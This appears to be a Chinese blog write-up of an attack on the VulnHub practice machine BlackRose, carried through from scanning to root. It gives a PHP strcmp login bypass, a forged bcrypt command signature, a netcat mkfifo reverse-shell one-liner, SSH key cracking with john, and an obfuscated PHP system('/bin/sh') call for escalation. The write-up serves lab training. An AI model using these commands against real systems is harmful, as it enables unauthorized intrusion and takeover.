39、BlackRose(VulnHub)

BlackRose

一、nmap

image-20240427220437782

image-20240427220444667

image-20240427220452410

image-20240427220619306

二、web渗透

随便看看

image-20240427220735205

注册进去

账号:xxxxxx
密码:xxxxxx

image-20240427220846304

目录爆破

有很多特殊的目录,不过访问后都重定向了

image-20240427221100539

image-20240427221223219

burpsuite改包进admin

查看xxxxxx用户数据包

抓一些xxxxxx用户的一些记录包,看看有什么可用的

signature=&command=id&indexcsrf=3cb58993bfd71f21cff82968ebb6d7958a69fe4cad1450c5c93ee97d51c88f1f

image-20240427221432270

发现有一个indexcsrf参数

尝试hash识别

image-20240427221505717

好像这个用户没用利用价值了

注册admin用户试试

admin用户名已经有了,没戏

image-20240427222120785

抓admin的登入包

image-20240427222759332

利用PHP strcmp()函数绕过进入

image-20240427223252449

通过放我们修改后的数据包后,成功进入admin

image-20240427223346098

不过这个有indexcsrf验证,是有时效期的,我们动作得快

image-20240427223536598

whoami命令执行

重新抓包绕过后发现whoami命令执行

signature=%242y%2410%246VJPFCWDVzHO0aGZoAIdZOGbdQ28AUhRvpya5sNcDmplkjws2JKCK
&
command=whoami

image-20240428090422211

image-20240428100436011

多次尝试会发现Timeout的问题

image-20240428090533167

重新抓包后,发现只有whoami命令可执行

image-20240428090708150

发现是bcrypt加密方式

image-20240428091504206

发现whoamibcrypt加密

signature=%242y%2410%246VJPFCWDVzHO0aGZoAIdZOGbdQ28AUhRvpya5sNcDmplkjws2JKCK
url解码:signature=$2y$10$6VJPFCWDVzHO0aGZoAIdZOGbdQ28AUhRvpya5sNcDmplkjws2JKCK
command=whoami

发现hash解出来只有whoami命令

image-20240428094216360

ncat udp反弹shell

那我们尝试将我们的反弹shell命令拿去bcrypthash加密,然后将hash和命令一同送入

https://www.browserling.com/tools/bcrypt
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.126.201 44444 >/tmp/f
==>
加密后:$2a$10$B8JaPPc25m8ezXPmHCTSSuZA5t6uI80HdbHjCgmHKVFATiNjdoxNm

image-20240428094626774

我们做了替换后还是无果,而且我们的密文根本没用变化,signature字眼无法修改

image-20240428094901685

直接前端html修改替换

image-20240428095558077

这里我尝试了好多好多次,因为这里的cstf的字眼校验,导致你盗用admin用户的tocken很快就失效了,所以这里一定要快,必要时快照准备

image-20240428100707668

没过一会发现又超时错误了,不过没关系shell还是可以使用的

image-20240428101152126

三、内网渗透

www-data用户初探

随便看看

python -c 'import pty; pty.spawn("/bin/bash")'

image-20240428101301706

计划任务和suid权限

image-20240428101449837

sudo -l => /bin/ld.so

image-20240428101707236

image-20240428101651370

我们用delx用户尝试执行一下这个命令,应该可以拿到delx用户的shell

拿下delx用户的进一步试探

拿下delx用户

image-20240428102001026

sudo -l 和发现ssh密钥文件

image-20240428102335067

搞出id_rsa文件尝试连接,发现还需要密码

image-20240428102619324

ssh密钥爆破

因为我们直接跑id_rsa文件是爆不出的,我们只能够先将文件ssh2john转换后,再进行john爆破

sudo ssh2john id_rsa > id_rsa.hash
sudo john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

doggiedog        (id_rsa) 

image-20240428103230829

delx用户远程登入探测

本机是普通用户的情况下记得要带上sudo

image-20240428103625495

查看delx用户有权限可访问的文件

find / -perm -u=s -type f 2>/dev/null
find / -type f -user delx 2>/dev/null		# 查看delx用户有权限可访问的文件

其中发现这一个比较可疑:/usr/local/.../showPassword

image-20240428104013583

发现井号,不过是虚惊一场

执行/usr/local/.../showPassword文件看看,吓了一跳,但是,只是虚惊一场而已。发现一个像似关键东西,我们记录下来

JqT/3t/ucYLw/dlb6c5PzmQM9lRYjuRIPgCmcHP+RTE=

image-20240428104432847

尝试下载showPassword文件

编程语言开放服务器好像不太行,python又没有httpmodule,后面我们就尝试scp传输

image-20240428105352105

ida64.exe逆向分析showPassword文件

image-20240428110434772

我们从中发现类似于密码的东西gqSFGqAJ,我们记录下来

image-20240428110714779

继续,输入gqSFGqAJ看看,啊后面又没了

image-20240428111618994

我们继续追溯过来,发现这个是不是需要什么解密才可以的

image-20240428111529568

最后经过尝试发现是AES encryption

RkZiPVkvxykJVOmxBmitBPeJXqFuxM

image-20240428111741501

竭尽全力回头看

/var/www/html/img/background-image.jpg

在与其他可登入用户测试此密钥后,它对其中任何一个都不起作用。我们继续回到www下面去寻找,果然,发现一个权限比较特殊的目录

image-20240428115025704

scp传输图片隐写分析

sudo scp -i id_rsa delx@192.168.126.241:/var/www/html/img/background-image.jpg ./
doggiedog

image-20240428115312994

发现需要密码

那么刚刚好,使用刚刚获得的正好可用

RkZiPVkvxykJVOmxBmitBPeJXqFuxM

image-20240428122913439

呃,不过,这又是什么东西

s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR

rot47解密

在线网站:https://dencode.com/cipher/rot47

经过搜索引擎发现和rot47最像

image-20240428123004309

没错,就是这个

DX|g+lfMg^U**\Kzd{S]Hb$FV"o?v#

image-20240428123100496

切换yourname用户继续

xxx用户忽略,这是我后面做测试的用户,与本次环境无关

su yourname
DX|g+lfMg^U**\Kzd{S]Hb$FV"o?v#

image-20240428123321901

user.txt

image-20240428123623146

sudo -l 提权

呃,又出了点问题,貌似直接都无法执行

image-20240428124153318

尝试绕过

既然提示了是File read,那么试试能不能读自己写的危险函数试试,不过尝试后发现应该是靶机上有检测,或者WAF之类的安全防护

image-20240428131407886

感觉有戏

image-20240428131514603

我们把root的shell写进去试试

注意这里bash不行哦

yourname@BlackRose:~$ vim tiquan.php 
yourname@BlackRose:~$ cat tiquan.php 
<?php
(sy.(st).em)('/bin/sh');
?>
yourname@BlackRose:~$ sudo -u root /usr/bin/blackrose
File read~# /home/yourname/tiquan.php
id
whoami

image-20240428131743922

root.txt and over

image-20240428132010805

补充(Netplan网络配置)

【Vulnhub靶场】靶机导入到vmware后获取不到IP - 北の泉 - 博客园 (cnblogs.com)

Ubuntu 通过 Netplan 配置网络教程 - 知乎 (zhihu.com)

posted @ 2024-04-28 15:04  gcc_com  阅读(5)  评论(0编辑  收藏  举报